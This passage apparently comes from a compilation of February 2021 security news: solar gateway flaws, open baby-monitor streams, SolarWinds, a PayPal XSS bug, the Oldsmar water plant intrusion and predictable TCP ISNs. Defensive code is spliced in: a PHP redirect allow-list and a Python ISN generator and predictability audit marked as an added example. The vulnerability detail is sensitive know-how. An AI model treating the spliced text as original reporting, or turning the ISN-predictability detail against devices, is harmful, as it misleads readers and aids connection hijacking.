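    // that is this plugin's own admin page; anything else goes to the default.
    if ( ! example_is_plugin_admin_url( $target ) ) {
        $target = $default;
    }
    wp_safe_redirect( $target );
    exit;
}

// True only for <site>/wp-admin/admin.php?page=example-plugin[...].
function example_is_plugin_admin_url( string $url ): bool {
    $parts = wp_parse_url( $url );
    $admin = wp_parse_url( admin_url( 'admin.php' ) );
    if ( empty( $parts['host'] ) || $parts['host'] !== $admin['host'] ) {
        return false;
    }
    if ( empty( $parts['path'] ) || $parts['path'] !== $admin['path'] ) {
        return false;
    }
    parse_str( isset( $parts['query'] ) ? $parts['query'] : '', $query );
    return isset( $query['page'] ) && 'example-plugin' === $query['page'];
}
```

Without the allow-list on the path, a same-host but attacker-chosen admin page would still pass wp_safe_redirect(), so the pinning check is what removes the redirect parameter as a steering mechanism.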
WordPress Plugin Security Problems
WordPress plugins continue to present serious vulnerabilities. In January, researchers warned of two vulnerabilities (one critical) in a WordPress plugin called Orbit Fox that could allow attackers to inject malicious code into vulnerable websites and/or take control of a website.
Also in January, developers of a plugin called Popup Builder – Responsive WordPress Pop up – Subscription & Newsletter, used by WordPress websites for building pop-up ads for newsletter subscriptions, issued a patch for a serious flaw. The vulnerability could be exploited by attackers to send out newsletters with custom content, or to delete or import newsletter subscribers.
Research Shows How Solar Energy Installations Can Be Abused by Hackers
18.2.2021 Hacking Securityweek
Researchers at cybersecurity firm FireEye have analyzed a gateway device used for solar energy installations, and discovered vulnerabilities that could be useful to malicious hackers.
The targeted device is the ConnectPort X2e made by Digi International, a US-based company that provides IT, networking and IoT solutions for industrial, enterprise and smart city applications. FireEye conducted its research on a version of the device offered by Tesla under the SolarCity brand — Tesla acquired solar panel maker SolarCity in 2016.
The X2e device is a programmable gateway used for residential and small commercial solar installations. It’s typically used to read data from a solar inverter and provide a connection to cloud-based applications.
FireEye’s research involved a physical inspection of the device, an analysis of debugging interfaces, removing the NAND storage, analyzing the file system and bootloader, glitch attacks, and software exploitation.
The research led to the discovery of two vulnerabilities: one related to the existence of hardcoded credentials (CVE-2020-9306), and a privilege escalation flaw (CVE-2020-12878) — both were classified as high severity. The security holes were reported to both Tesla and Digi, and they have been patched.
According to FireEye, an attacker who has network access to the targeted device could exploit the vulnerabilities to obtain a root shell and remotely take complete control of the device.
“If an attacker is able to compromise an X2e device, they would have access to a networked device in a home or enterprise,” FireEye researchers Jake Valletta and Sam Sabetan told SecurityWeek.
“X2e’s are typically only used for data collection purposes and if compromised, an attacker could install a backdoor on the X2e which could be used to laterally move in a network, call out to a remote server for persistent access, or stage a larger attack on the victim’s network,” they added, clarifying that “this scenario holds for any compromised IoT device on a network.”
The researchers noted that the device is typically behind a residential firewall so remote attacks directly from the internet should not be possible, unless the user has intentionally made it accessible from the web.
“However, ConnectPort X2e’s are used for various purposes and are not exclusive to solar installations. Therefore, it is possible some X2e devices, based on their use case, are exposed to the Internet,” they explained.
FireEye has made available detailed technical information on its research into the X2e device [part 1 and part 2].
Misconfigured Baby Monitors Allow Unauthorized Viewing
17.2.2021 Hacking Threatpost
Hundreds of thousands of individuals are potentially affected by this vulnerability.
A vulnerability affecting multiple baby monitors could allow someone to drop in and view a camera’s video stream, according to researchers. Potentially hundreds of thousands of live devices are impacted, they said.
The issue exists in the manufacturers’ implementation of the Real-Time Streaming Protocol (RTSP), which is a set of procedures used by various cameras to control their streaming media. It’s possible to misconfigure its implementation, so that no authentication is needed for unknown parties to connect, according to the SafetyDetectives cybersecurity team.
“Whilst this means that potentially harmful individuals could be able to access private images of your children, their bedrooms and possessions, this specific vulnerability is also concerning with regards to daycare centers – which are commonly known to stream video from inside kindergarten for onlooking parents and guardians,” researchers said. “If your baby monitor or any RTSP camera does not require parties to enter a password each time they connect to the video stream, the images shown on that stream are potentially unsecured, and therefore accessible to anyone.”
The specific models that the team tested that proved to be vulnerable include the Hipcam RealServer/V1.0; the webcamXP 5; and the Boa/0.94.14rc21.
Initial research on Shodan showed large numbers of vulnerable devices connected to the internet, all over the world.
“Our team was able to identify unsecured devices either through their ‘server header,’ or their onscreen overlay that details the particular brand,” according to researchers, writing on Tuesday. “A server header is a strip of information provided with RTSP that details numerous factors, including the device type. The server header gives us evidence of which devices provide unauthorized access.”
Hundreds of Thousands of Potential Victims
The SafetyDetectives team first uncovered 110,000 open camera streams.
“Of these cameras, over half of them are being used as CCTV, providing surveillance for shops or the exterior of properties,” they explained. “Around 10 percent of these cameras are used for viewing house interiors, like living rooms or hallways. Most of the remaining cameras are baby monitors, being used to check up on children, or as cameras in child daycare centers, or retirement homes.”
Given the number of people in a daycare center at any given time, the number of individuals affected could be quite high, according to the report.
“There’s also the possibility that there are hundreds of thousands of additional streams yet undiscovered, that we simply do not have the time to sift through,” researchers said.
What Causes this Data Exposure?
The SafetyDetectives team didn’t provide granular technical details, but in general found four primary reasons for why baby monitors can become unsecured.
Devices designed for local networks are streamed over the internet.
Some devices can be misconfigured for use outside of a local network, without adequate authorization.
IP webcams that are repackaged as baby monitors.
Manufacturer oversight.
On the first two points, baby monitors are designed for use on local networks that are linked together in one physical location, such as a residence, an office or a school. Thus, some allow local devices to connect to their streams freely, with the assurance that the privatized, local network itself will provide enough security.
“Unfortunately, if an organization (such as a daycare center) was to stream with this type of device online and the connection isn’t password-protected, there are no security procedures in place to stop anyone from gaining access to these cameras,” according to the researchers.
Some cameras also allow a direct connection to a laptop or computer that also has access to the internet, opening up a potential attack avenue.
The latter two points have to do with manufacturer choices.
“In the name of cutting-corners, various companies have been known to rebrand IP webcams as baby monitors,” according to the report. “This is a common occurrence within the e-commerce space, where a number of e-commerce stores wrongly advertise cameras as products that are suitable for use as a baby monitor. In most cases, the original manufacturer has not intended, nor marketed, their product for use as such.”
So, if a parent uses these cameras to view their video streams from outside of the home, these devices can quite easily become misconfigured, allowing unauthorized access without the owners realizing it.
“Manufacturers also have a responsibility to warn their customers that they must secure their devices properly before taking them online,” researchers noted. “Many brands fail to warn customers in a way that is glaringly obvious, if at all. Unfortunately, the end result of manufacturer oversight can be a slapdash product without any of the important authentication procedures.”
How to Protect Children from Snoopers
The potential impact of these misconfigurations can be severe, the researchers pointed out. But there are steps a user can take to only allow access to people who are permitted to view the video stream.
“Many of these cameras are streaming directly and indirectly identifiable information,” researchers said. “This can include anything from images of your children to the interior of your house or daycare center. Some hackers are even able to find out the name and address of the user (through the use of additional programs).”
Refer to the camera’s user guide to find out how to password-protect the device.
If the device does not allow users to set a password, avoid exposing it to the internet altogether.
Log into the home or facility router and look for a setting called “access control” or “access list.” This allows users to whitelist specific IP addresses, allowing only those devices to connect. (Devices attempting to connect with the router will appear in a ‘blocked’ menu, and users can simply click ‘allow’ to grant them access.)
Research each device thoroughly before buying, to make sure it’s a legitimate baby monitor and not a repackaged Wi-Fi webcam.
Daycare centers should make sure their devices are secured through password protection.
The malicious code in SolarWinds attack was the work of 1,000+ developers
16.2.2021 Hacking Securityaffairs
Microsoft says it found 1,000-plus developers’ fingerprints on the SolarWinds attack
Microsoft’s analysis of the SolarWinds supply chain attack revealed that the code used by the threat actors was the work of a thousand developers.
Microsoft president Brad Smith provided further details about the investigation into the SolarWinds supply chain attack; the company’s analysis of the malicious code involved in the hack suggests it was the work of a thousand developers.
Smith shared Microsoft’s findings with the US TV program 60 Minutes, where he described the attack as “the largest and most sophisticated attack the world has ever seen.”
“When we analysed everything that we saw at Microsoft, we asked ourselves how many engineers have probably worked on these attacks. And the answer we came to was, well, certainly more than 1,000.” Smith said.
“What we are seeing is the first use of this supply chain disruption tactic against the United States,” Smith added. “But it’s not the first time we’ve witnessed it. The Russian government really developed this tactic in Ukraine.”
The discovery is disconcerting and gives an idea of the complexity of the attack and of the effort the threat actors invested in it.
Smith didn’t attribute the attack to a specific threat actor; he only pointed out that the offensive was comparable in effort to the attacks on the Ukraine power grid that were attributed to Russia-linked APT groups.
FireEye CEO Kevin Mandia was also interviewed as part of the same TV program and described how his experts discovered the attack when hackers attempted to bypass two-factor authentication.
“Just like everybody working from home, we have two-factor authentication. A code pops up on our phone. We have to type in that code. And then we can log in. A FireEye employee was logging in, but the difference was our security staff looked at the login and we noticed that individual had two phones registered to their name. So our security employee called that person up and we asked, “Hey, did you actually register a second device on our network?” And our employee said, “No. It wasn’t, it wasn’t me.” said Mandia.
“Suspicious, FireEye turned its gaze inward, and saw intruders impersonating its employees snooping around inside their network, stealing FireEye’s proprietary tools to test its clients defenses and intelligence reports on active cyber threats. The hackers left no evidence of how they broke in – no phishing expeditions, no malware.”
Smith also revealed that the core of the malicious code employed in the attack was composed of 4,032 lines.
“SolarWinds Orion” is one of the most ubiquitous software products you probably never heard of, but to thousands of I.T. departments worldwide, it’s indispensable. It’s made up of millions of lines of computer code. 4,032 of them were clandestinely re-written and distributed to customers in a routine update, opening up a secret backdoor to the 18,000 infected networks.” Smith explained. “Microsoft has assigned 500 engineers to dig in to the attack. One compared it to a Rembrandt painting, the closer they looked, the more details emerged.”
Chris Inglis, former Deputy Director of the National Security Agency, explained that the government did not detect this attack because it does not monitor private-sector networks. The government also did not find it on its own networks, which is a disappointment: the attack bypassed government defense systems like the “Einstein” platform designed to detect cyber attacks on government agencies.
“The Russians outsmarted it. They circumvented the NSA, which gathers intelligence overseas, but is prohibited from surveilling U.S. computer networks. So the Russians launched their attacks from servers set up anonymously in the United States.” concludes Inglis.
“U.S. Intelligence Community, U.S. Department of Defense, can suggest what the intentions of other nations are based upon what they learn in their rightful work overseas. But they can’t turn around and focus their unblinking eye on the domestic infrastructure. That winds up making it more difficult for us.”
Many SolarWinds Customers Failed to Secure Systems Following Hack
16.2.2021 Hacking Securityweek
Many companies still expose SolarWinds Orion to the internet and have failed to take action following the disclosure of the massive SolarWinds breach, according to RiskRecon, a Mastercard company that specializes in risk assessment.
Threat actors believed to be backed by Russia breached Texas-based IT management firm SolarWinds and used that access to deliver a piece of malware named Sunburst to roughly 18,000 customers who had been using the company’s Orion monitoring product. A few hundred victims that presented an interest to the hackers received other payloads that provided deeper access into their environments.
A second, apparently unrelated threat group believed to be operating out of China also targeted SolarWinds, delivering a piece of malware named Supernova. The delivery of Supernova required access to the targeted network and involved exploitation of a zero-day vulnerability in Orion, which SolarWinds patched shortly after its existence came to light.
RiskRecon on Friday said it observed 1,785 organizations exposing Orion to the internet on December 13, 2020, shortly after the breach came to light, and the number dropped to 1,330 by February 1, 2021. However, only 8% of these companies have applied the Orion update (2020.2.4) released by SolarWinds in response to the breach.
Even more concerning is that 4% of the companies that expose Orion still use a version containing the Sunburst code. Moreover, roughly one-third of these organizations still haven’t patched the vulnerability exploited by Supernova.
RiskRecon says the list of organizations running vulnerable Orion instances includes state and local government agencies, universities, hosting providers, and Fortune 500 firms.
Microsoft Believes 1,000 Hackers Involved in SolarWinds Attack
An article published by the New York Times in January said some intelligence officials had concluded that “more than a thousand Russian software engineers” were most likely involved in the attack. Some cybersecurity professionals questioned the claims at the time.
However, Brad Smith, president and legal chief at Microsoft, reiterated the belief over the weekend in an interview on the CBS program 60 Minutes.
“When we analyzed everything that we saw at Microsoft, we asked ourselves how many engineers have probably worked on these attacks. And the answer we came to was, well, certainly more than 1,000,” Smith said, adding that Microsoft tasked 500 engineers with investigating the attack.
Smith also said the attackers had written roughly 4,000 lines of code that were then delivered to customers of SolarWinds’ Orion product.
“I think from a software engineering perspective, it's probably fair to say that this is the largest and most sophisticated attack the world has ever seen,” Smith said.
PayPal addresses reflected XSS bug in user wallet currency converter
15.2.2021 Hacking Securityaffairs
PayPal has addressed a reflected cross-site scripting (XSS) vulnerability that affected the currency converter feature of user wallets.
PayPal has fixed a reflected cross-site scripting (XSS) vulnerability that was discovered in the currency converter feature of user wallets on February 19, 2020, close to one year ago.
The ‘reflected XSS and CSP bypass’ vulnerability was reported by the bug bounty hunter “Cr33pb0y” through the HackerOne platform.
“An endpoint used for currency conversion was found to suffer from a reflected XSS vulnerability, where user input was not being properly sanitized in a parameter in the URL. This could lead to a malicious user injecting malicious JavaScript, HTML, or any other type of code that the browser may execute. The malicious script will execute in the browser page DOM of another user typically without their knowledge or consent.” reads the summary published by PayPal.
PayPal has implemented additional validation checks and sanitizer controls for user input in the currency exchange feature before that input is returned in the response.
According to PayPal, the flaw resided in the currency conversion endpoint and was caused by a failure to properly sanitize the input in a parameter in the URL.
An attacker could have exploited the flaw to inject malicious code (JavaScript, HTML, or any other language) that would be executed within the browser.
This means that the malicious script will execute in the browser page Document Object Model (DOM) of another user typically without their knowledge or consent.
In a real attack scenario, threat actors could trigger the flaw by tricking the victims into clicking on a specially crafted link.
Malicious payloads could be executed to carry out multiple malicious activities, such as stealing cookies and session tokens.
Cr33pb0y received a $2,900 reward as part of the bug bounty program.
Florida Water Plant Hack: Leaked Credentials Found in Breach Database
13.2.2021 Hacking Threatpost
Researchers discovered credentials for the Oldsmar water treatment facility in the massive compilation of data from breaches posted just days before the attack.
Researchers say they found several stolen and leaked credentials for a Florida water-treatment plant, which was hacked last week.
Researchers at CyberNews said they found 11 credential pairs linked to the Oldsmar water plant in a 2017 compilation of stolen breach credentials. Meanwhile, they also found 13 credential pairs in the more recent “compilation of many breaches” (COMB for short) that was posted just days before the attack.
This collection was leaked on the RaidForums English-language cybercrime community on Feb. 2 and contains a staggering 3.27 billion unique combinations of cleartext email addresses and passwords in an aggregate database.
Of note, officials have not publicly drawn any connection between the credentials discovered in the leaked credential breach databases and the attack last week.
The Florida Water Plant Hack
The attack on the Oldsmar water-treatment facility in Florida occurred last Friday, when an attacker used remote access to the system to change the level of sodium hydroxide, more commonly known as lye, in the water from 100 parts per million to 11,100 parts per million.
The change was immediately detected by a plant operator, who changed the levels back before the attack had any impact on the system.
According to a Massachusetts security advisory published Wednesday, the attackers accessed the water treatment plant’s SCADA controls via TeamViewer, which is remote access software. TeamViewer was installed on computers by the water treatment plant, used by personnel to conduct system status checks and to respond to alarms or other issues that cropped up during the water treatment process.
“All computers used by water plant personnel were connected to the SCADA system and used the 32-bit version of the Windows 7 operating system,” according to the recent advisory. “Further, all computers shared the same password for remote access and appeared to be connected directly to the Internet without any type of firewall protection installed.”
The Leaked Data-Breach Credentials
Researchers with CyberNews recently delved into a breach compilation leaked online by hackers in 2017 and the more recent COMB data trove “to search for credentials from the domain ci.oldsmar.fl.us,” according to a blog post published Thursday by Bernard Meyer with CyberNews, and found several matches.
Researchers claim the attackers may have used the credentials acquired from either the 2017 breach compilation or COMB in the hack. However, given the close date of the COMB leak to the attack, it’s more likely that it was in this database that attackers found the credentials used in the system breach, Meyer noted.
What’s not clear is how old the credentials are, and whether they are specific to TeamViewer or otherwise.
“Regarding the credentials for the Florida water supply system, we could not confirm whether they were admin or Teamviewer for legal and ethical reasons,” Mantas Sasnauskas, senior information security researcher at CyberNews, told Threatpost. “We just pointed to the fact that there were some type of [plant] credentials in the leaked [database].”
The Oldsmar Water Plant Hack: Credentials Used?
CyberNews researchers said that the attack was likely rolled out in multiple stages. “The first part of the cyber kill chain would be espionage and reconnaissance — looking at the ICS system, who controls it, what domain they use for emails, and whether they can be accepted as login usernames,” Meyer wrote.
The second phase may have involved a credential-stuffing attack that would have provided attackers remote access to the system, he said. In this type of attack, hackers build automated scripts that systematically try stolen IDs and passwords against various accounts until a match is found.
As part of this, he said, the attacker may have checked various compilations of leaked credentials for credential pairs on those domains, which is where the COMB cache may have come in handy.
“The second stage of the cyber kill chain would be the actual intrusions–in this case, the credential stuffing,” he wrote.
It’s unclear if the COMB credentials were in fact used, but the fact that some of the plant’s logins were found in the database is a notable coincidence, researchers said.
Authorities from Pinellas County Sheriff’s Office, the FBI and the U.S. Secret Service are still working together to investigate exactly what happened in the attack, although they do not believe it was state-sponsored.
While authorities said they have leads in the attack, they still don’t know who exactly was behind it, where the attackers are located and what the motive might be. The incident once again is a reminder of the potential catastrophic effect an attack on critical infrastructure can have on public safety, making the security of these systems a top concern, security experts said.
Vulnerabilities in TCP/IP Stacks Allow for TCP Connection Hijacking, Spoofing
13.2.2021 Hacking Securityweek
Improperly generated ISNs (Initial Sequence Numbers) in nine TCP/IP stacks could be abused to hijack connections to vulnerable devices, according to new research from Forescout.
TCP/IP stacks are critical components that provide basic network connectivity for a broad range of devices, IoT and OT included, and which process all incoming frames and packets.
Numerous high-impact vulnerabilities affecting the TCP/IP stacks have already been publicly disclosed, including the Ripple20 and URGENT/11 bugs. In December last year, Forescout’s researchers detailed 33 new vulnerabilities in four open source TCP/IP stacks, collectively called AMNESIA:33.
Diving into 11 stacks this time, the researchers discovered that nine of them fail to properly generate ISNs, thus leaving connections open to attacks. Collectively referred to as NUMBER:JACK, the vulnerabilities affect cycloneTCP, FNET, MPLAB Net, Nucleus NET, Nut/Net, picoTCP, uIP, uC/TCP-IP, and TI-NDKTCPIP (Nanostack and lwIP are not impacted).
ISNs must be randomly generated, so as to ensure the uniqueness of any TCP connection between two devices, and to eliminate collisions and interference with the connection. However, should an attacker be able to guess an ISN, they could hijack an ongoing connection, close a connection (denial of service), or even spoof a new one.
Eight of the identified issues carry a CVSS score of 7.5, namely CVE-2020-27213 (Nut/Net 5.1), CVE-2020-27630 (uC/TCP-IP 3.6.0), CVE-2020-27631 (CycloneTCP 1.9.6), CVE-2020-27632 (NDKTCPIP 2.25), CVE-2020-27633 (FNET 4.6.3), CVE-2020-27634 (uIP 1.0, Contiki-OS 3.0, Contiki-NG 4.5), CVE-2020-27635 (PicoTCP 1.7.0, PicoTCP-NG), and CVE-2020-27636 (MPLAB Net 3.6.1), while the ninth has a CVSS score of 6.5 (CVE-2020-28388 – Nucleus NET 4.3).
“However, the actual severity on a particular device and TCP connection may vary depending on, for example, the use of encrypted sessions and the sensitivity of data exchanged,” Forescout’s researchers note.
The vulnerable stacks are implemented in millions of embedded devices, including IT storage systems, medical devices, remote terminal units (RTUs), and monitoring systems for wind turbines, among others.
Administrators are advised to identify devices that run the vulnerable TCP/IP stacks (Forescout has released an open-source script to aid with discovery), apply the available patches if possible, apply network segmentation to diminish risks, and use end-to-end cryptographic solutions built on top of the Network layer (IPsec).
The identified vulnerabilities were reported to the affected vendors and maintainers in October last year, and most of them have already released patches to address the bugs, except for Nut/Net developers, who are still working on a solution, and the uIP developers, who never replied to Forescout.
“Unfortunately, this type of vulnerability is also difficult to fix permanently because of the resource constraints of many embedded devices, and what is considered a secure PRNG today may be considered insecure in the future. Some stack developers opt to rely on system integrators to implement their own ISN generation, which is a fair decision, but which means not all devices using a patched stack will be secure automatically,” the researchers conclude.
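The property the researchers describe (an ISN that cannot be guessed from other connections) is what the standard construction in RFC 6528 provides: a clock term plus a keyed hash of the connection 4-tuple. The following added example, which is not Forescout’s discovery script or any of the named stacks’ code, puts that generator beside a constructed counter-based one and runs a coarse audit over ISNs collected from repeated connections; the addresses, secret and step size are assumptions.

```python
"""Constructed illustration of ISN generation and a predictability check.
Added example; not Forescout's script or any of the named stacks' code."""
import hashlib
import hmac
import struct
from typing import List

MOD32 = 1 << 32


def rfc6528_isn(src_ip: str, src_port: int, dst_ip: str, dst_port: int,
                secret: bytes, now_us: int) -> int:
    """ISN = M + F(4-tuple, secret), the RFC 6528 construction.

    M is a 32-bit clock ticking every 4 microseconds; F is a keyed hash of
    the connection 4-tuple. Because F differs per 4-tuple, ISNs observed on
    one connection say nothing about the ISN of another. RFC 6528 suggests
    MD5 over (tuple || secret); this constructed example uses HMAC-SHA256
    with the same overall structure."""
    m = (now_us // 4) % MOD32
    tuple_bytes = f"{src_ip}:{src_port}>{dst_ip}:{dst_port}".encode()
    digest = hmac.new(secret, tuple_bytes, hashlib.sha256).digest()
    f = struct.unpack(">I", digest[:4])[0]
    return (m + f) % MOD32


class CounterIsn:
    """Constructed weak generator: a global counter bumped by a fixed step
    per connection, ignoring the 4-tuple. Every ISN follows from the last."""

    def __init__(self, start: int = 0x1000, step: int = 64000):
        self.next_isn = start
        self.step = step

    def isn(self) -> int:
        value = self.next_isn
        self.next_isn = (self.next_isn + self.step) % MOD32
        return value


def deltas(isns: List[int]) -> List[int]:
    """Signed differences between consecutive ISNs, wrapped at 32 bits."""
    out = []
    for a, b in zip(isns, isns[1:]):
        d = (b - a) % MOD32
        if d >= MOD32 // 2:
            d -= MOD32
        out.append(d)
    return out


def looks_predictable(isns: List[int], window: int = 1 << 24) -> bool:
    """Audit ISNs collected from repeated connections to one device.

    Flags the series when consecutive values repeat one increment (counter)
    or all stay inside a narrow window (bare clock). A keyed-hash ISN spreads
    its differences over the full 32-bit range, so neither condition holds.
    This is a coarse check in the spirit of a discovery script, not
    Forescout's own."""
    ds = deltas(isns)
    if len(ds) < 3:
        raise ValueError("need at least four ISN samples")
    most_common = max(ds.count(d) for d in set(ds))
    constant_step = most_common >= len(ds) / 2
    small_spread = all(abs(d) < window for d in ds)
    return constant_step or small_spread


def probe_rfc6528(n: int, secret: bytes) -> List[int]:
    """Simulate n connections 10 ms apart from consecutive source ports
    (constructed addresses from the RFC 5737 documentation ranges)."""
    return [rfc6528_isn("192.0.2.10", 40000 + i, "198.51.100.5", 80,
                        secret, i * 10_000) for i in range(n)]


def probe_counter(n: int) -> List[int]:
    """Same probe against the constructed counter generator."""
    gen = CounterIsn()
    return [gen.isn() for _ in range(n)]


def probe_clock_only(n: int) -> List[int]:
    """Generator that uses only the clock term M, with no keyed hash."""
    return [((i * 10_000) // 4) % MOD32 for i in range(n)]


if __name__ == "__main__":
    for name, series in (("counter", probe_counter(8)),
                         ("clock-only", probe_clock_only(8)),
                         ("rfc6528", probe_rfc6528(8, b"constructed-secret"))):
        print(f"{name:10s} predictable={looks_predictable(series)}")
```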
Hacker Tries to Poison Water Supply of Florida Town
10.2.2021 Hacking Threatpost
A threat actor remotely accessed the IT system of the water treatment facility of Oldsmar and raised the levels of sodium hydroxide in the water, an action that was quickly noticed and remediated.
A threat actor hacked into the computer system of the water treatment facility in Oldsmar, Fla., and tried to poison the town’s water supply by raising the levels of sodium hydroxide, or lye, in the water supply. The attack happened just two days before NFL’s Super Bowl LV was held nearby in Tampa Bay, according to local authorities.
An operator at the plant first noticed a brief intrusion Friday, Feb. 5, around 8:00 a.m., Pinellas County Sheriff Bob Gualtieri said in a press conference about the incident Monday. Someone remotely accessed the computer system the operator was monitoring that controls chemical levels in the water as well as other operations, he said.
At first the operator “didn’t think much of it” because it’s normal for his supervisors to use the remote access feature to monitor his computer screen at times, Gualtieri said. However, around 1:30 p.m. someone again remotely accessed the computer system and the operator observed the mouse moving around on the screen to access various systems that control the water being treated, he said.
Lye Levels Raised at Water Treatment Plant
During the second intrusion, which lasted three to five minutes, the intruder changed the level of sodium hydroxide in the water from 100 parts per million to 11,100 parts per million, “a significant and potentially dangerous increase,” Gualtieri said.
“Sodium hydroxide, also known as lye, is the main ingredient in liquid drain cleaners,” he said. “It is used to control water acidity and remove metals from drinking water in water-treatment plants.”
Fortunately, the operator quickly changed the level back to normal after the intrusion and alerted supervisors, who then contacted the Pinellas County Sheriff’s Office. Gualtieri said his team notified the FBI and U.S. Secret Service and worked with them over the weekend to investigate and try to discover who was behind the attack.
At this time authorities have leads but have not identified a suspect, nor do they know if the attack came from inside the United States or outside the country, he said.
Motive Behind Hack Remains Elusive
They also do not have a motive for the attack, although it did occur just before the Super Bowl was held in Tampa Bay on Sunday. The event can typically draw upwards of 150,000 visitors to the region but this year only about 22,000 live spectators were allowed to attend the game due to the COVID-19 pandemic.
Still, Gualtieri asked all critical infrastructure operators in the Tampa Bay area to check to ensure that their systems have the latest security protocols in place. He also stressed that despite the seriousness of the Oldsmar incident, “at no time was there a significant adverse effect on the water being treated.”
“Importantly, the public was never in danger,” Gualtieri said.
Even if the operator hadn’t so quickly noticed the nefarious activity, he said it would have taken 24 to 36 hours for the tainted water to hit the water supply, and redundancies in the system would have tested it before then and caught the high levels of sodium hydroxide.
At Risk: Critical Infrastructure
Still, the incident is a dire reminder of the potential catastrophic effect an attack on critical infrastructure can have on public safety, making the security of these systems a top concern, security experts said.
“With so much emphasis recently placed on hacks for the health care and financial services industry, an infrastructure hack such as this tends to hit much closer to home as it regards our physical safety,” noted Tom Garrubba, CISO of Shared Assessments, in an email to Threatpost.
Indeed, given past attacks on the U.S. critical infrastructure such as the power grid, water systems and nuclear plants, organizations in control of these systems should take the latest attack in Florida as a call to action, observed Hitesh Sheth, president and CEO at Vectra, a San Jose, Calif.-based provider of AI for detecting cyberattacks, in an e-mail to Threatpost.
“Protecting these critical facilities, and upgrading their cyber defenses, should be a far higher priority,” he said.
Some experts cited the COVID-19 pandemic for putting critical infrastructure at higher risk due to the necessity of putting remote access capabilities in place sooner than operators of these systems expected for employees forced to work remotely due to pandemic restrictions.
“Many organizations have previously felt protected by traditional perimeter security such as firewalls and VPNs,” observed Kevin Dunne, president at Greenlight, a Flemington, New Jersey-based integrated risk management firm, in an e-mail to Threatpost. “However, the new shift to work from anywhere has reduced the efficacy of many of these methods and even rendered some of them useless.”
Rather than relying on VPNs to secure networks, Dunne suggested that the most effective way to secure remote access is to monitor identity and access “to know exactly who is accessing critical systems and what they are doing with that access.”
Hack Exposes Vulnerability of Cash-Strapped US Water Plants
10.2.2021 Hacking Securityweek
A hacker’s botched attempt to poison the water supply of a small Florida city is raising alarms about just how vulnerable the nation’s water systems may be to attacks by more sophisticated intruders. Treatment plants are typically cash-strapped, and lack the cybersecurity depth of the power grid and nuclear plants.
A local sheriff’s startling announcement Monday that the water supply of Oldsmar, population 15,000, was briefly in jeopardy last week exhibited uncharacteristic transparency. Suspicious incidents are rarely reported, and usually chalked up to mechanical or procedural errors, experts say. No federal reporting requirement exists, and state and local rules vary widely.
“In the industry, we were all expecting this to happen. We have known for a long time that municipal water utilities are extremely underfunded and under-resourced, and that makes them a soft target for cyber attacks,” said Lesley Carhart, principal incident responder at Dragos Security, which specializes in industrial control systems.
“I deal with a lot of municipal water utilities for small, medium and large-sized cities. And in a lot of cases, all of them have a very small IT staff. Some of them have no dedicated security staff at all,” she said.
The nation’s 151,000 public water systems lack the financial fortification of the corporate owners of nuclear power plants and electrical utilities. They are a heterogeneous patchwork, less uniform in technology and security measures than in other rich countries.
As the computer networks of vital infrastructure become easier to reach via the internet — and with remote access multiplying dizzily during the COVID-19 pandemic — security measures often get sacrificed.
“It’s a hard problem, but one that we need to start addressing,” said Joe Slowik, senior security researcher at DomainTools. He said the hack illustrates “a systemic weakness in this sector.”
Cybersecurity experts said the attack at the plant 15 miles northwest of Tampa seemed ham-handed, it was so blatant: Whoever breached Oldsmar’s plant on Friday using a remote access program shared by plant workers briefly increased the amount of lye — sodium hydroxide — by a factor of 100, according to Pinellas County Sheriff Bob Gualtieri. Lye is used to lower acidity, but in high concentrations it is highly caustic and can burn. It’s found in drain cleaning products.
The intruder’s timing and visibility seemed almost comical to cybersecurity experts. A supervisor monitoring a plant console about 1:30 p.m. saw a cursor move across the screen and change settings, Gualtieri said, and was able to immediately reverse it. The intruder was in and out in five minutes.
The public was never in peril, though the intruder took “the sodium hydroxide up to dangerous levels,” the sheriff said. Also, plant safeguards would have detected the chemical alteration in the 24-36 hours it would have taken to affect the water supply, he said.
Gualtieri said Tuesday that water goes to holding tanks before reaching customers, and “it would have been caught by a secondary chemical check.” He did not know if the hacker was domestic or foreign — and said no one related to a plant employee was suspected. He said the FBI and Secret Service were assisting in the investigation. How the hacker got in remains unclear, he said, though it was possible the hacker was able to create administrator credentials.
Jake Williams, CEO of the cybersecurity firm Rendition Infosec, said engineers have been creating safeguards “since before remote control via cyber was a thing,” making it highly unlikely the breach could have led to “a cascade of failures” tainting Oldsmar’s water.
There’s been an uptick in hacking attempts of water treatment plants in the past year, the cybersecurity firm FireEye said, but most were by novices, many stumbling on systems while using a kind of search engine for industrial control systems called Shodan.
The serious threat is from nation-state hackers like the Russian agents blamed for the months-long SolarWinds campaign that has plagued U.S. agencies and the private sector for at least eight months and was discovered in December. While U.S. officials have called SolarWinds a grave threat, they also call it cyberespionage, rather than an attempt to do damage.
Laying boobytraps that could be triggered in an armed conflict is another matter. Russian hackers are known to have infiltrated U.S. industrial control systems, including the power grid, and Iranian agents are blamed for the breach of a suburban New York dam in 2013. But there is no indication any “logic bombs” have been activated, as Russia did in Ukraine when military hackers briefly brought down parts of the electrical grid in the winters of 2015 and 2016.
A 2020 paper in the Journal of Environmental Engineering found that water utilities have been hacked by a variety of actors, including amateurs just poking around, disgruntled former employees, cybercriminals looking to profit and state-sponsored hackers. Although such incidents have been relatively few, that does not mean the risk is low and that most water systems are secure. This is because so-called “air gaps” between internet-connected networks and the systems that directly manage pumps and other plant components are becoming less common.
“The reality is that many cybersecurity incidents either go undetected, and consequently unreported, or are not disclosed because doing so may jeopardize the victim’s reputation, customers’ trust, and, consequently, revenues,” the paper says.
After Friday’s incident, Oldsmar officials disabled the remote-access system and warned other city leaders in the region — which was hosting the Super Bowl — to check their systems.
In May, Israel’s cyber chief said the country had thwarted a major cyber attack the previous month against its water systems, an assault widely attributed to Iran. Had Israel not detected the attack in real time, he said chlorine or other chemicals could have entered the water, leading to a “disastrous” outcome.
The Biden administration has already signaled its intention of beefing up cybersecurity, a sector its predecessor was roundly accused of not taking seriously enough.
So far this year, the Department of Homeland Security has issued 25 advisories listing various industrial control systems that could be vulnerable to hacking. Affected products range from 3D rendering software to security cameras to insulin pumps.
Chris Sistrunk, a technical manager at FireEye’s Mandiant division, said cybersecurity issues are relatively new for U.S. water utilities, whose biggest problems are pipes freezing and busting in winter or getting clogged with disposable wipes. The Oldsmar hack highlights the need for more training and basic security protocols, but not drastic measures like sweeping new regulations.
“We have to do something, we can’t do nothing. But we can’t overreact,” he said.
Fake Forcepoint Google Chrome Extension Hacks Windows Users
9.2.2021 Hacking Threatpost
In a unique attack, cybercriminals locally install an extension to manipulate data in internal web applications that the victims have access to.
